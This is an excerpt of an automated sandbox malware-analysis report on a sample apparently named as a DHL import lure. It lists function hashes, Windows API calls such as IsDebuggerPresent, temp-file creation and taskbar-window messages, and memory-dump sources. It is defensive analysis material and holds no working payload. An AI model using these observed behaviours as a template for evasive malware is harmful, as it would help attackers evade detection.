                                                                                          • Instruction ID: 491999daea385653667b3ae9da1ba78393875e6cff37fa5f91e29466df7e9711
                                                                                          • Opcode Fuzzy Hash: eb38b154e1662264dc5dfc05fc563f95009c33e85855c46c3dc30ed8e5d431d3
                                                                                          • Instruction Fuzzy Hash: 00E0D83134534866D31036957C07F997E84EF09B20F100426F7D8D5AC38AEA245016E9
                                                                                          APIs
                                                                                            • Part of subcall function 007EF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,007F0D71,?,?,?,007D100A), ref: 007EF7CE
                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,007D100A), ref: 007F0D75
                                                                                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,007D100A), ref: 007F0D84
                                                                                          Strings
                                                                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 007F0D7F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                          • API String ID: 55579361-631824599
                                                                                          • Opcode ID: 4e9d4709eefc12117568a03c72072bcca4e3eaae66325c3c91f29f50d3d8c67d
                                                                                          • Instruction ID: b57839db8760e1984d4207629454a5a11ba9a3a095c7d83af724fc3fdacbc655
                                                                                          • Opcode Fuzzy Hash: 4e9d4709eefc12117568a03c72072bcca4e3eaae66325c3c91f29f50d3d8c67d
                                                                                          • Instruction Fuzzy Hash: 29E06D743003518BD7209FB8E4083667BE4BB04744F01892DEA82C6B52DBB9E4448BD1
                                                                                          APIs
                                                                                          • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0084302F
                                                                                          • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00843044
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Temp$FileNamePath
                                                                                          • String ID: aut
                                                                                          • API String ID: 3285503233-3010740371
                                                                                          • Opcode ID: 9ed3724a25a9c4eae5b0fba1afb335edecd50e40022a6de77d2bce4d4b7b5622
                                                                                          • Instruction ID: 05394420553cf6d6849e509c476fd7a721a815743c1c37c917db2cd8af344fab
                                                                                          • Opcode Fuzzy Hash: 9ed3724a25a9c4eae5b0fba1afb335edecd50e40022a6de77d2bce4d4b7b5622
                                                                                          • Instruction Fuzzy Hash: 92D05E7250032867DA20A7A4EC0EFDB3B6CEB04750F0002A2BA95E2191EAF49984CAD0
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: LocalTime
                                                                                          • String ID: %.3d$X64
                                                                                          • API String ID: 481472006-1077770165
                                                                                          • Opcode ID: 576d644d69be0dcf98704effb8952d050676df48fac4c731a37694c979e7b359
                                                                                          • Instruction ID: 7f0bf38894debf48567309020e65e8cde77621b3852e102471b49e954011f32f
                                                                                          • Opcode Fuzzy Hash: 576d644d69be0dcf98704effb8952d050676df48fac4c731a37694c979e7b359
                                                                                          • Instruction Fuzzy Hash: 24D012A180926CE9CB5097E0EC498B9B77CFB08305FA48452F806D1140D628E588A761
                                                                                          APIs
                                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0086232C
                                                                                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0086233F
                                                                                            • Part of subcall function 0083E97B: Sleep.KERNEL32 ref: 0083E9F3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: FindMessagePostSleepWindow
                                                                                          • String ID: Shell_TrayWnd
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0086236C
• PostMessageW.USER32(00000000), ref: 00862373
  • Part of subcall function 0083E97B: Sleep.KERNEL32 ref: 0083E9F3
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
APIs
• MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0080BE93
• GetLastError.KERNEL32 ref: 0080BEA1
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0080BEFC
Similarity
• API ID: ByteCharMultiWide$ErrorLast
• String ID: